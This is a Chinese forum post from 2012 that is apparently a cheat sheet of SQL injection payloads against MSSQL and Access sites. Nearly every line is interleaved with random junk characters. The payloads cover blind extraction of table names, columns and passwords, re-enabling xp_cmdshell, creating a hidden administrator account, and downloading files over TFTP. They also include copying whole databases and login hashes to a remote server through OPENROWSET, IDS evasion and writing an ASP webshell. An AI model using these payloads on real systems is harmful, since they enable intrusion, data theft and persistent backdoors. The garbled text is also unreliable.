1..判断有无注入点 : l3 h3 r" V# @4 O& Z
; and 1=1 and 1=2
+ T* ^9 a7 p- b' Q' g, n. D
9 T! Z( H8 @; Y! O$ n" j' K7 J9 X# i, v- T6 \2 U$ S8 h2 M1 }$ @% |
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
- J& G; H2 V* Mand 0<>(select count(*) from *) ( j- a7 R. ^# L9 y" R# T( p$ c
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
1 D8 z* T' D G0 b; p% ~) z. |
2 |2 k1 |% S- z0 ]4 _% L( Y. J d" S( l7 I( M0 Z( I7 V
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 % } C* K3 C9 ~: I7 j
and 0<(select count(*) from admin) . w; B: _4 y! L7 l! h6 V y' N
and 1<(select count(*) from admin)
4 h! Y( n& \& o6 U, |猜列名还有 and (select count(列名) from 表名)>0
0 T1 c6 h' E; ^' B; D5 ?# I/ d; k: C4 e# s" N b
% c* s( g1 s! o" a4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
6 P- n X+ f$ e/ sand 1=(select count(*) from admin where len(*)>0)--
0 n2 L! E. a" m+ G% {: J2 y) V/ Iand 1=(select count(*) from admin where len(用户字段名称name)>0)
, O7 ~* s9 f c2 I7 s8 m0 x4 z/ ]* pand 1=(select count(*) from admin where len(密码字段名称password)>0) 8 T* v" ~. h, |! E4 K
2 j y# ~- T, y* Y- z
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
2 Z# a4 n) D4 `1 k) @- land 1=(select count(*) from admin where len(*)>0)
0 f. e0 L% ^) g, j6 H9 j- u, D9 Band 1=(select count(*) from admin where len(name)>6) 错误 7 C/ S$ T+ z( I9 e: n5 X; J. H
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
( }6 a! A6 S/ o$ Zand 1=(select count(*) from admin where len(name)=6) 正确 6 U9 v9 G2 }( @9 m! A
$ y* W+ A7 x( t
and 1=(select count(*) from admin where len(password)>11) 正确
+ h% v* _; B# u- w; zand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
! x8 k% v$ S# E* Tand 1=(select count(*) from admin where len(password)=12) 正确 6 i1 D' S ~; v) \! T6 M& ~- u
猜长度还有 and (select top 1 len(username) from admin)>5
. b7 ? |7 r5 g
2 l6 z: B# M/ s4 K( X- Z+ X/ _1 N% H1 w) ~( O: I- p# B
6.猜解字符
9 F& ~! F! N) |3 H. l( yand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 . J! n( ^3 {3 T0 c: W2 N
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 $ v5 y' ~# h4 R0 P( |- C
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 : w: O( Y2 R0 M6 r2 K T
* D$ x( ~+ m# `* H
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算( K; S9 |, K& i+ j
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
$ B1 _ f% }# ?& F这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. & S2 z$ `$ y6 i$ n6 o( h8 M
1 \/ }* Z# \; J/ y% A
group by users.id having 1=1-- 5 K, P( z1 x% e2 ~& h& f8 g3 L
group by users.id, users.username, users.password, users.privs having 1=1--
' ]* k# V& o! s9 O, ]; insert into users values( 666, attacker, foobar, 0xffff )--
, ^% r/ o9 L! O. ] B. v. y b: x$ M! ?: J$ s$ L, A
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- 4 j7 E. r* ^ P; z/ b) M% u
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
" q6 K. ~0 `8 C0 ~1 h+ s7 PUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
: V0 Z `' i7 g( T. ^* J* wUNION SELECT TOP 1 login_name FROM logintable-
! _7 Y. Y6 j+ D$ v3 U6 V0 [UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- ! N' P. o1 F9 Y& P7 n: M
6 e) b# o, q# v# |! C5 a看服务器打的补丁=出错了打了SP4补丁 * {- o' K; o# Q1 N7 ~
and 1=(select @@VERSION)--
: G( Q7 a2 f E# c7 N1 N6 T
* q$ O5 G/ {. D7 K/ e: s, w' U看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 9 o0 O; {4 F4 h) q; X
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- 8 H5 X+ A" D4 A- c5 ^- {0 m B+ ~
) x$ D' E7 o0 [" E0 t O) }
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
1 G5 p/ @% [$ A% ?4 I5 W2 Zand sa=(SELECT System_user)-- , y3 q+ I9 s2 u
and user_name()=dbo-- 0 b5 b1 O- L2 @) F9 w. D4 \
and 0<>(select user_name()-- 5 L* r/ o0 {2 \# a* W* ^
' s& s8 l( ?" w* ?) f9 Z
看xp_cmdshell是否删除 3 J3 b+ l2 Z4 F/ h
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- 8 R) x/ M; S! z0 A
C+ b+ @& ^6 h- |+ O( D) O1 k. ?
xp_cmdshell被删除,恢复,支持绝对路径的恢复 7 d7 o4 Z0 w, i) E. j" j, p
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
3 m) ]1 t4 |. @; d, }: e/ G" _! e;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
/ I4 N, c4 a6 |9 ]; v
- L5 n0 t' z6 m& m反向PING自己实验 ' e; T9 g+ J9 N, b0 h# T
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- " F& r9 @" f) l3 m9 T
3 L( b" }8 j& l6 l- Z+ ~7 k8 X$ x
加帐号 / l [# m1 J) ~0 E4 }: X
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
2 r/ n2 K% M" L0 z* g. m5 f
* n* E1 Q5 ?2 T- `$ a$ d6 |' x* x创建一个虚拟目录E盘:
0 h/ r) ]+ ?- m4 i' j! x;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
/ a: U1 F3 F* k; _( _) U6 M( |7 q8 C- S2 H( i) k1 r4 M
访问属性:(配合写入一个webshell) 1 G, r- c' l% m0 ]
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
! `6 v" Q) f' r( A- |
" ]: @" |0 H5 _' C# H% u2 D( E4 v% s, ~4 Y
MSSQL也可以用联合查询
" }7 u! e2 t4 a4 z4 r?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
; }! r2 r: Q, S# R% U7 z% G0 i% s?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
; u" n- G$ m ~$ Z) f
l: X+ l% r! \" g' t* ?4 {/ S- [1 F
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 , V0 M# G% j9 N$ u7 B
6 `5 R- m/ K. f
8 M j- G6 |! g
/ s5 L* R2 L* q2 l得到WEB路径
2 {& O. N; Y. x/ Z;create table [dbo].[swap] ([swappass][char](255));--
% [3 r& Y* k# w2 e8 \$ p! Z3 qand (select top 1 swappass from swap)=1-- & D4 J" x' D* N1 u6 n
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
8 s1 ]! _: R& R9 K;use ku1;--
: _5 ?6 h- i2 |9 U;create table cmd (str image);-- 建立image类型的表cmd 1 |1 b5 C$ l; d c! J
' ]; n0 }6 F% e# W6 @
存在xp_cmdshell的测试过程: - a; A5 t5 q+ ^ M
;exec master..xp_cmdshell dir
1 Q/ S3 R) [5 s( X; j% n;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 ) b l. [: Z0 \4 B1 W
;exec master.dbo.sp_password null,jiaoniang$,1866574;-- ; H7 d7 O8 G0 {. N
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- , Z- ~* F' t9 ^- }
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
/ }- E7 O2 ~' R! o! T4 Z0 k;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
. E8 I' {( F1 P+ A* ? Uexec master..xp_servicecontrol start, schedule 启动服务
1 {( X2 c+ P% T" k3 qexec master..xp_servicecontrol start, server
# u; c7 Q5 u" D# A% c$ p; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
; p3 T [4 j4 R1 i;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add ( {" p- C% m. E/ {4 x" E% B2 n5 P, @
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 - e3 J2 Q( t/ T/ ]
( O) F+ F, a# l# H& t7 v/ U* O
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
% l( a2 x: K% x5 T;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
: C8 O8 E- J. S/ D+ \* Q+ f8 v0 t4 V;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
% n1 d5 f: e* | x$ v* G" I! Z: W如果被限制则可以。 / { _6 q6 E: O$ S! V
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
4 ~: \) B& b+ v. h6 n& o; h9 q& [- A) g8 H
查询构造: 0 J9 A) w J8 F9 u4 A" S! c
SELECT * FROM news WHERE id=... AND topic=... AND .....
1 w5 y* b+ F) h/ yadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
- V8 Z1 {# m: m, F0 f4 [) G8 X5 eselect 123;-- / D* C' m( x9 {- x; D$ J
;use master;-- 9 z9 h2 P9 t1 q: ^- M4 |* c
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
6 r. y7 J% l7 \. V9 I8 Kand 1<>(select count(email) from [user]);--
7 w4 @7 n2 h) [* i6 {" \$ y;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 8 G" [! P- V( |
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
t6 U; v$ E6 x0 N5 T;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- 4 ^* Q, }0 b* f: Z; m, ^8 ~
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 5 ?+ J* w& X. j5 C
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
* d" i' t9 I$ s, n: g' m! s;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
2 `9 h. D5 s' F6 V* R/ D5 e上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
* |% V" I. [. e4 J通过查看ffff的用户资料可得第一个用表叫ad + y; {8 P" ` B1 }1 v. E) ~ Y5 t7 A
然后根据表名ad得到这个表的ID 得到第二个表的名字
: u! O6 C9 @) n2 d
/ h/ I# J! p7 P& i$ ]; r5 sinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- * V: F1 u4 n, e* c9 B: X
insert into users values( 667,123,123,0xffff)-- $ U3 Q/ [* D. ^
insert into users values ( 123, admin--, password, 0xffff)-- & x, F: m' U/ ]
;and user>0 + U4 ?/ S" V$ X
;and (select count(*) from sysobjects)>0
1 A& r. F' U, e8 D. U;and (select count(*) from mysysobjects)>0 //为access数据库
5 u: w( O( I0 _( d* ]2 V- f4 ~! h
6 }3 g$ @" G+ V0 ^枚举出数据表名 & _! W# H. G- R" |; ?8 x
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- ! {8 H( \- u# k1 C, q8 x
这是将第一个表名更新到aaa的字段处。
' J; Z8 p/ A1 ^, O读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 ; Z5 |& _1 p5 L; ? A
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
* T& F* [! |: \& Y8 U0 h然后id=1552 and exists(select * from aaa where aaa>5)
! n$ ?7 ?1 R) E, s读出第二个表,一个个的读出,直到没有为止。
9 v7 l( X/ C- G r3 r: ~; j2 K# N读字段是这样: 1 P% i C) E3 o3 N7 R
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
V; q# }1 Z9 @4 y+ M1 r6 M8 n+ `( _然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ) E, ? P% h3 E6 K1 Z' ~5 r$ P |# q: E
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
8 X1 }$ y! E( y1 F$ i! I2 M, X5 p9 @- D然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
, G4 ~& r7 b7 e% }+ K
2 z' ]8 H( [+ H, c[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
$ b# |! N& _; I$ |8 }6 Z% |/ vupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
9 O4 D$ o6 F& i通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] 5 R$ [& l! a: v9 P8 P8 Z' h
3 O& R* I+ P5 A7 ^7 W8 K
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
6 H# X8 ?; H- r, v& |: g+ fupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
# { g2 ^! D8 S7 V, r5 p' S+ F, {( d4 U
绕过IDS的检测[使用变量]
, q( ~' h8 G. O; [' \;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 8 n; ^$ Z$ g' g) E
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
& v7 r+ \- `" @, b" R+ L2 F# y3 X- G' Z/ ?# D$ r
1、 开启远程数据库
( B6 K4 ^6 T0 K! s9 x0 @! u5 l( N- u+ c基本语法
" ^8 Q0 A0 G& C- |9 Eselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
- }( V7 M) O' g2 b7 q( i参数: (1) OLEDB Provider name # H3 S x5 c0 P% z
2、 其中连接字符串参数可以是任何端口用来连接,比如
4 @2 b( w% x: nselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
( L* S& |6 U( C: M. X& ]1 O3.复制目标主机的整个数据库insert所有远程表到本地表。
! ~4 G8 g; s2 x$ `' F2 z4 i. Q2 p; }& K6 T
基本语法:
) `$ P2 O6 a! {8 z8 A* r' vinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 / V. g3 v) z. K# r, D- ^
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
9 W$ S$ y8 ~" u! y5 ]# sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 , T; A7 U( K( H
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) 7 K' `0 J# `2 b% G r( R
select * from master.dbo.sysdatabases . t$ E$ v( z" a. I' l! q4 o
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
1 R- ]) {& w( r; l! Vselect * from user_database.dbo.sysobjects
/ w" L- b# H$ H- j( k6 Z7 @2 X/ Ginsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 1 X1 y" W4 e; S( `( H- R
select * from user_database.dbo.syscolumns
$ C# m; \7 a& _: L! Q! T! D复制数据库: 5 g- r# k5 V3 ^( J
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
6 |9 D! Y, t. G0 K+ ~; ~insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
- a, F3 J3 {8 e' p R2 h+ U; Q9 D" l- p' c; N; a) V2 v( Q j+ E# c
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 8 T: O. t. B7 G
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins 0 }/ e7 q0 Z/ L/ W8 G% h. A! c
得到hash之后,就可以进行暴力破解。
1 a O- p/ i- ]2 w6 a N) i
0 L) _' z. g9 S" ~, h+ n4 q遍历目录的方法: 先创建一个临时表:temp
2 {6 k' m- Y* U8 ~" N;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
8 _/ ]0 ~3 b A. A) {1 A" P;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 3 d' X/ }3 m! j/ S) H) T; [
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 5 G X* q* `: p3 F2 o7 v
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 8 U' m' s, ]$ G7 U9 F0 l
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
6 t( ?$ G) l; B+ c% _;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
- m- N3 o1 H7 E) R) R;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
# `& ?- a( Q8 t# U$ U8 r8 g+ O;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc * R& R1 d8 _4 E* K% V. a( C
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) 3 B: U0 b1 x! G& f
写入表:
* a" A6 ]) h H1 N8 P语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
* Z9 Q9 D9 G* L K8 L语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- 3 R2 G0 f- S# l6 s1 }! \; l! m
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- 4 ^% b# j3 a' L# C6 C/ B: _! ~
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- * i; i n2 B1 r
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
3 {# N, D5 T( f& I( d/ Q* g% c语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
4 y0 N$ K9 @4 `+ g语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 0 ]: D7 f1 E4 m
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- / |$ _3 z5 u0 ]0 P. g: h# ?: K
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- : S( b0 f) ]) K2 x3 W
8 x& S7 s& i6 S7 i把路径写到表中去: / w/ ]- V8 q. v
;create table dirs(paths varchar(100), id int)-- $ k/ e+ w! ?4 m
;insert dirs exec master.dbo.xp_dirtree c:\--
5 \% F, }' Z; f/ b( {2 land 0<>(select top 1 paths from dirs)--
4 E# a- M* I$ D6 a" \and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
* Y5 `1 Z$ j8 Q8 e# {7 S;create table dirs1(paths varchar(100), id int)-- & R6 C5 T( R) I, b! X( B
;insert dirs exec master.dbo.xp_dirtree e:\web--
6 x3 L& e- V* ?% I8 Fand 0<>(select top 1 paths from dirs1)--
" @# M7 s: b0 F% [$ y! w
; P( r2 ?* J. `! h6 E把数据库备份到网页目录:下载
9 P+ m+ l) A' x% {, u! Z4 d;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
/ Q9 J4 t0 K+ y2 U' l; P0 N
6 g" T& p6 j/ e! B1 aand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
9 K) u8 K3 u' ?' J2 V: B4 E: E" Tand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
% }# f8 i* Q) p$ o* gand 1=(select user_id from USER_LOGIN) ! g1 I4 B7 ^8 _# f0 \5 r
and 0=(select user from USER_LOGIN where user>1) [" f+ r' \/ l( w, L
% g4 G( E3 \! @, v7 \" F
-=- wscript.shell example -=-
; j7 }) {- ~+ \9 |( Mdeclare @o int * _4 H; z( l& g
exec sp_oacreate wscript.shell, @o out
, P! ~4 x1 G. t1 v4 jexec sp_oamethod @o, run, NULL, notepad.exe
6 F/ a8 i m. }; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- ' J2 F4 F9 Z) {% L; c8 Q
4 X& C: J. x$ Z5 }
declare @o int, @f int, @t int, @ret int
* t! B/ g9 y; Y, F8 V& Ydeclare @line varchar(8000)
& `* c2 Y9 F. P1 \+ Cexec sp_oacreate scripting.filesystemobject, @o out , a( N8 z( @* U3 L1 V5 k
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 ( D/ ?$ |$ J; n. l; H3 J+ }
exec @ret = sp_oamethod @f, readline, @line out
+ x$ y8 T) Q. Dwhile( @ret = 0 )
" x6 A t& O) n% y5 qbegin + X( n5 m- ]* v# [4 i
print @line ' y! \9 l! G1 B" X3 ] B( I
exec @ret = sp_oamethod @f, readline, @line out " U; y$ `) E7 o" r9 S. Z9 l
end $ Y4 k2 @* W( R
T. n5 ?# W) h, E& A5 v1 B0 R
declare @o int, @f int, @t int, @ret int 7 v5 }! F: e' ^% V0 |
exec sp_oacreate scripting.filesystemobject, @o out
- T5 y$ y- y/ e. ^exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 ' I( N! r6 |6 |
exec @ret = sp_oamethod @f, writeline, NULL, / d2 {- V! e3 t( F" ~' W4 M
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
2 j6 s, _7 F, L% Z2 m8 y
4 ^+ r8 [4 w$ U4 \declare @o int, @ret int . s, \% |1 R3 q5 _) E- g
exec sp_oacreate speech.voicetext, @o out . k9 i# f" k k5 w9 d j# ^
exec sp_oamethod @o, register, NULL, foo, bar
0 P) i7 }4 u( J2 I9 a$ ^exec sp_oasetproperty @o, speed, 150
/ i0 w3 [' J9 H/ n& l" n$ Lexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 / I# h- I6 Z+ T! ^& ]% F) @$ F V
waitfor delay 00:00:05 / ]3 I0 ]/ x; f3 K' F }
* g* u& z4 p+ i, ?: F: s# A
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
3 Z, o. w& h9 Z/ s9 f! j4 W6 n
$ @9 o. ~, B; a5 D/ m6 x9 O( n' cxp_dirtree适用权限PUBLIC 4 O1 [$ r7 t, I) h6 M
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
3 L% d( C3 R6 u$ c8 O8 `! ecreate table dirs(paths varchar(100), id int)
. v! b, g- E" N建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 0 M/ t+ v4 t4 N# W1 U! ]: [% V! ]. Z
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
0 t5 P, a0 A8 e/ F& x7 S |
发表于 2012-9-15 14:32:40
收藏
支持
反对